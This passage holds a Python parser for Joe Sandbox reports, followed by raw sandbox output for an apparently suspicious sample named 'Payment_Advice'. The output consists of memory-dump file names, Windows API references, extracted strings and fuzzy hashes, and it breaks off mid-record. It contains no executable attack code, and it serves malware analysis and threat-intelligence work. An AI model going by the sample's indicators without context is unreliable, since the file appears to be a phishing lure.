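            key, value = m.group(1), m.group(2).strip().removesuffix("Download File").strip()
            if key == "Source File":
                s = SOURCE_RE.match(value)
                if s is None:
                    raise ValueError(f"unexpected Source File line: {value}")
                cur.source_dump, cur.offset = s["dump"], int(s["off"], 16)
                cur.based_on_pe = s["pe"] == "true"
            elif key == "Associated":
                cur.associated.append(value)
            elif key in KEYMAP:
                setattr(cur, KEYMAP[key], value)
    return records

def decode_dump_name(name: str) -> dict:
    # ASSUMPTION about the .sdmp naming convention: process index, dump index, timestamp, base
    # address, page protection, then three flag fields kept raw; only the protection is decoded.
    parts = name.split(".")
    if len(parts) != 9 or parts[-1] != "sdmp":
        raise ValueError(f"not an 8-field sdmp name: {name}")
    protect = int(parts[4], 16)
    return {"process_index": int(parts[0], 16), "dump_index": int(parts[1], 16), "timestamp": parts[2],
            "base": int(parts[3], 16), "protect_name": PAGE_PROTECT.get(protect, f"0x{protect:x}"),
            "raw_flags": parts[5:8]}

def shared_functions(a: list, b: list) -> set:
    """Instruction Fuzzy Hash values in both record sets (exact match; the report's fuzzy scoring is not reproduced)."""
    return {r.instruction_fuzzy for r in a if r.instruction_fuzzy} & {r.instruction_fuzzy for r in b}

def inconsistent_records(records: list) -> list:
    # Every entry on this page has Opcode ID == Opcode Fuzzy Hash; flag any record that differs.
    return [r for r in records if r.opcode_id != r.opcode_fuzzy]

if __name__ == "__main__":
    a, b = parse_report(REPORT_A), parse_report(REPORT_B)
    print(len(a), "records;", decode_dump_name(a[0].source_dump)["protect_name"], shared_functions(a, b))
```

The intersection is an exact string match on the Instruction Fuzzy Hash; the report's own Similarity section compares the fuzzy hashes with a scoring the page does not show, so treat an exact hit across two reports as a strong signal and a miss as inconclusive rather than as evidence of different code.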

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 18c5b8a0116227a962686d03b9001e832b0f9c4c93c63f6d81b26a0e562a2cf3
                                                                                                    • Instruction ID: 89a7e480c4a59fe023087e9647129b96f13687fee7d3c302d02e1f713bfe2c4b
                                                                                                    • Opcode Fuzzy Hash: 18c5b8a0116227a962686d03b9001e832b0f9c4c93c63f6d81b26a0e562a2cf3
                                                                                                    • Instruction Fuzzy Hash: AB51D0B1A087159FC748CF19D48055AFBE1FF88314F058A2EE899E3341D734E999CB96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                    • Instruction ID: adc6f18ed3d01e48818b15b02221a23bcaf7f71a220e2d8bbceafaf11463e380
                                                                                                    • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                    • Instruction Fuzzy Hash: D831E4B1A147468FDB14DF28C8652AEBFE0FB95304F148A2DE485D7341C738EA4ACB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0051C744
                                                                                                      • Part of subcall function 0051B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0051B3FB
                                                                                                      • Part of subcall function 0051AF98: _wcschr.LIBVCRUNTIME ref: 0051B033
                                                                                                    • _wcslen.LIBCMT ref: 0051CA0A
                                                                                                    • _wcslen.LIBCMT ref: 0051CA13
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0051CA71
                                                                                                    • _wcslen.LIBCMT ref: 0051CAB3
                                                                                                    • _wcsrchr.LIBVCRUNTIME ref: 0051CBFB
                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0051CC36
                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0051CC46
                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,0054A472), ref: 0051CC54
                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0051CC7F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                                                                    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$Q
                                                                                                    • API String ID: 986293930-1471198225
                                                                                                    • Opcode ID: 7d7da006f23f6ad63a0f71a73cd4bae9367a202454eb21618627dab6dd0214ef
                                                                                                    • Instruction ID: c91a847727c51c4faec925e353a73fd8bfc2bea57a4023e4414b1fb6bd33989f
                                                                                                    • Opcode Fuzzy Hash: 7d7da006f23f6ad63a0f71a73cd4bae9367a202454eb21618627dab6dd0214ef
                                                                                                    • Instruction Fuzzy Hash: 26E15472940219AAEF25DBA4DD89DEE7BBCBF45310F4044A5F645E7080EB749EC88B60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • _swprintf.LIBCMT ref: 0050E30E
                                                                                                      • Part of subcall function 00504092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005040A5
                                                                                                      • Part of subcall function 00511DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00541030,?,0050D928,00000000,?,00000050,00541030), ref: 00511DC4
                                                                                                    • _strlen.LIBCMT ref: 0050E32F
                                                                                                    • SetDlgItemTextW.USER32(?,0053E274,?), ref: 0050E38F
                                                                                                    • GetWindowRect.USER32(?,?), ref: 0050E3C9
                                                                                                    • GetClientRect.USER32(?,?), ref: 0050E3D5
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0050E475
                                                                                                    • GetWindowRect.USER32(?,?), ref: 0050E4A2
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0050E4DB
                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 0050E4E3
                                                                                                    • GetWindow.USER32(?,00000005), ref: 0050E4EE
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0050E51B
                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0050E58D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                    • String ID: $%s:$CAPTION$d$tS
                                                                                                    • API String ID: 2407758923-1013587617
                                                                                                    • Opcode ID: 394505c7150ba2e35dfaa27da79ee56f25eda703f5abec3f4c5dd8b38849bbc0
                                                                                                    • Instruction ID: a94cb400238003dd6e63ad75c06c1c829b811f51092e9220e8f9b5e0638607fd
                                                                                                    • Opcode Fuzzy Hash: 394505c7150ba2e35dfaa27da79ee56f25eda703f5abec3f4c5dd8b38849bbc0
                                                                                                    • Instruction Fuzzy Hash: A0819071608341AFD710DFA8CD89A6FBBE9FBC9704F04091DFA8497291D670E909CB52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___free_lconv_mon.LIBCMT ref: 0052CB66
                                                                                                      • Part of subcall function 0052C701: _free.LIBCMT ref: 0052C71E
                                                                                                      • Part of subcall function 0052C701: _free.LIBCMT ref: 0052C730
                                                                                                      • Part of subcall function 0052C701: _free.LIBCMT ref: 0052C742
                                                                                                      • Part of subcall function 0052C701: _free.LIBCMT ref: 0052C754
                                                                                                      • Part of subcall function 0052C701: _free.LIBCMT ref: 0052C766
                                                                                                      • Part of subcall function 0052C701: _free.LIBCMT ref: 0052C778
                                                                                                      • Part of subcall function 0052C701: _free.LIBCMT ref: 0052C78A
                                                                                                      • Part of subcall function 0052C701: _free.LIBCMT ref: 0052C79C
                                                                                                      • Part of subcall function 0052C701: _free.LIBCMT ref: 0052C7AE
                                                                                                      • Part of subcall function 0052C701: _free.LIBCMT ref: 0052C7C0
                                                                                                      • Part of subcall function 0052C701: _free.LIBCMT ref: 0052C7D2
                                                                                                      • Part of subcall function 0052C701: _free.LIBCMT ref: 0052C7E4
                                                                                                      • Part of subcall function 0052C701: _free.LIBCMT ref: 0052C7F6
                                                                                                    • _free.LIBCMT ref: 0052CB5B
                                                                                                      • Part of subcall function 00528DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0052C896,?,00000000,?,00000000,?,0052C8BD,?,00000007,?,?,0052CCBA,?), ref: 00528DE2
                                                                                                      • Part of subcall function 00528DCC: GetLastError.KERNEL32(?,?,0052C896,?,00000000,?,00000000,?,0052C8BD,?,00000007,?,?,0052CCBA,?,?), ref: 00528DF4
                                                                                                    • _free.LIBCMT ref: 0052CB7D
                                                                                                    • _free.LIBCMT ref: 0052CB92
                                                                                                    • _free.LIBCMT ref: 0052CB9D
                                                                                                    • _free.LIBCMT ref: 0052CBBF
                                                                                                    • _free.LIBCMT ref: 0052CBD2
                                                                                                    • _free.LIBCMT ref: 0052CBE0
                                                                                                    • _free.LIBCMT ref: 0052CBEB
                                                                                                    • _free.LIBCMT ref: 0052CC23
                                                                                                    • _free.LIBCMT ref: 0052CC2A
                                                                                                    • _free.LIBCMT ref: 0052CC47
                                                                                                    • _free.LIBCMT ref: 0052CC5F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                    • String ID: hS
                                                                                                    • API String ID: 161543041-2356671337
                                                                                                    • Opcode ID: 2498362b9781d22f364279affc93e93bc76db478f0dc5e50037bc8b70f1460ee
                                                                                                    • Instruction ID: b1328f6afb50fe89df482e2e55d8488842b458049c498bb909859f2a775b4d12
                                                                                                    • Opcode Fuzzy Hash: 2498362b9781d22f364279affc93e93bc76db478f0dc5e50037bc8b70f1460ee
                                                                                                    • Instruction Fuzzy Hash: C7314F326012269FEB20AA79F84AB6A7FE9FF52310F544819E558D71E2DF31AC44CB10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00529705
                                                                                                      • Part of subcall function 00528DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0052C896,?,00000000,?,00000000,?,0052C8BD,?,00000007,?,?,0052CCBA,?), ref: 00528DE2
                                                                                                      • Part of subcall function 00528DCC: GetLastError.KERNEL32(?,?,0052C896,?,00000000,?,00000000,?,0052C8BD,?,00000007,?,?,0052CCBA,?,?), ref: 00528DF4
                                                                                                    • _free.LIBCMT ref: 00529711
                                                                                                    • _free.LIBCMT ref: 0052971C
                                                                                                    • _free.LIBCMT ref: 00529727
                                                                                                    • _free.LIBCMT ref: 00529732
                                                                                                    • _free.LIBCMT ref: 0052973D
                                                                                                    • _free.LIBCMT ref: 00529748
                                                                                                    • _free.LIBCMT ref: 00529753
                                                                                                    • _free.LIBCMT ref: 0052975E
                                                                                                    • _free.LIBCMT ref: 0052976C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID: 0dS
                                                                                                    • API String ID: 776569668-685347439
                                                                                                    • Opcode ID: 12c6efec3fc8e957b0b3dc606272bba1c5fdcb4103f45e0eb90245c26afdb888
                                                                                                    • Instruction ID: 4bfe408bd3511010ce5448b0d72ac72fa05f77a32bbeda54cfd42a169f68dd9a
                                                                                                    • Opcode Fuzzy Hash: 12c6efec3fc8e957b0b3dc606272bba1c5fdcb4103f45e0eb90245c26afdb888
                                                                                                    • Instruction Fuzzy Hash: 0E11C67611101AAFDB01EF94E846CE93FB5FF55350B1158A0FA084F2B2DE31DA549B84
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00519736
                                                                                                    • _wcslen.LIBCMT ref: 005197D6
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 005197E5
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00519806
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                                                                                    • String ID: FvnQ$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                    • API String ID: 1116704506-1813482186
                                                                                                    • Opcode ID: 810591c16aa82ed61d28d4a53100d37858c499085afb111e2a3ae800f094b4eb
                                                                                                    • Instruction ID: 33a59ec5f95066f28d2f1ebac3f78461b08658d34a1626799a0ffdd799fd13ef
                                                                                                    • Opcode Fuzzy Hash: 810591c16aa82ed61d28d4a53100d37858c499085afb111e2a3ae800f094b4eb
                                                                                                    • Instruction Fuzzy Hash: B73127325083127AF725AF24AC1AFAB7F9CFF93710F14011DF501961D2EB64AA4983A6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetWindow.USER32(?,00000005), ref: 0051D6C1
                                                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 0051D6ED
                                                                                                      • Part of subcall function 00511FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0050C116,00000000,.exe,?,?,00000800,?,?,?,00518E3C), ref: 00511FD1
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0051D709
                                                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0051D720
                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0051D734
                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0051D75D
                                                                                                    • DeleteObject.GDI32(00000000), ref: 0051D764
                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0051D76D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                    • String ID: STATIC
                                                                                                    • API String ID: 3820355801-1882779555
                                                                                                    • Opcode ID: eb54b3bf232e7672aba2038cc5859adb67834334cfb409c0cfc286172c8eb124
                                                                                                    • Instruction ID: 03a05a4c2e7a81de9ac2a29e7995651125d183a5e0405c9536e387f85681c4f7
                                                                                                    • Opcode Fuzzy Hash: eb54b3bf232e7672aba2038cc5859adb67834334cfb409c0cfc286172c8eb124
                                                                                                    • Instruction Fuzzy Hash: 5511D2729013117BF7216B749C4EFEF7E6CFB94721F004110FA41A21D2DAA48A8996B5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                    • String ID: csm$csm$csm
                                                                                                    • API String ID: 322700389-393685449
                                                                                                    • Opcode ID: bfac7d3df54529a00459b74cd9e40856c97aa6488959284207edabbaddb2b4e4
                                                                                                    • Instruction ID: 552d87d5739cb6b9b79348c4ed729abc68a9d6bdbed79f3b4f300a2827629a84
                                                                                                    • Opcode Fuzzy Hash: bfac7d3df54529a00459b74cd9e40856c97aa6488959284207edabbaddb2b4e4
                                                                                                    • Instruction Fuzzy Hash: 81B1AD3580022AEFCF25DFA4E9859AEBFB5FF46310F144059F8016B292C739DA61CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00506FAA
                                                                                                    • _wcslen.LIBCMT ref: 00507013
                                                                                                    • _wcslen.LIBCMT ref: 00507084
                                                                                                      • Part of subcall function 00507A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00507AAB
                                                                                                      • Part of subcall function 00507A9C: GetLastError.KERNEL32 ref: 00507AF1
                                                                                                      • Part of subcall function 00507A9C: CloseHandle.KERNEL32(?), ref: 00507B00
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                    • API String ID: 3122303884-3508440684
                                                                                                    • Opcode ID: a65aaf77ccf533e90e5bc257c60612268dba4b99426f81ddf56e995a6ca6c8b1
                                                                                                    • Instruction ID: e07e088deb434e741a1d33e238245b69ee20a415185b46842b896553ae35706b
                                                                                                    • Opcode Fuzzy Hash: a65aaf77ccf533e90e5bc257c60612268dba4b99426f81ddf56e995a6ca6c8b1
                                                                                                    • Instruction Fuzzy Hash: D241E9B1D0874A6AEB20E7709D4AFEE7F6CBF49304F004455F945A61C2D674BA88C761
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 00501316: GetDlgItem.USER32(00000000,00003021), ref: 0050135A
                                                                                                      • Part of subcall function 00501316: SetWindowTextW.USER32(00000000,005335F4), ref: 00501370
                                                                                                    • EndDialog.USER32(?,00000001), ref: 0051B610
                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0051B637
                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0051B650
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0051B661
                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0051B66A
                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0051B67E
                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0051B694
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                    • String ID: LICENSEDLG
                                                                                                    • API String ID: 3214253823-2177901306
                                                                                                    • Opcode ID: 54069ec4adc47e0e01afd8bd6b436d9bc4eca329539e9f1917c17026ff3d8bfe
                                                                                                    • Instruction ID: 0feab71eaa036a1ab7ff8b9b3bd560a36944a2e3a266fe585f10445dc4f2685b
                                                                                                    • Opcode Fuzzy Hash: 54069ec4adc47e0e01afd8bd6b436d9bc4eca329539e9f1917c17026ff3d8bfe
                                                                                                    • Instruction Fuzzy Hash: 5821F631204215BBF3115B69ED4EFBB3F6CFB66B55F010014F600961A0DBA2AE48F631
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,8E9784F4,00000001,00000000,00000000,?,?,0050AF6C,ROOT\CIMV2), ref: 0051FD99
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0050AF6C,ROOT\CIMV2), ref: 0051FE14
                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0051FE1F
                                                                                                    • _com_issue_error.COMSUPP ref: 0051FE48
                                                                                                    • _com_issue_error.COMSUPP ref: 0051FE52
                                                                                                    • GetLastError.KERNEL32(80070057,8E9784F4,00000001,00000000,00000000,?,?,0050AF6C,ROOT\CIMV2), ref: 0051FE57
                                                                                                    • _com_issue_error.COMSUPP ref: 0051FE6A
                                                                                                    • GetLastError.KERNEL32(00000000,?,?,0050AF6C,ROOT\CIMV2), ref: 0051FE80
                                                                                                    • _com_issue_error.COMSUPP ref: 0051FE93
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
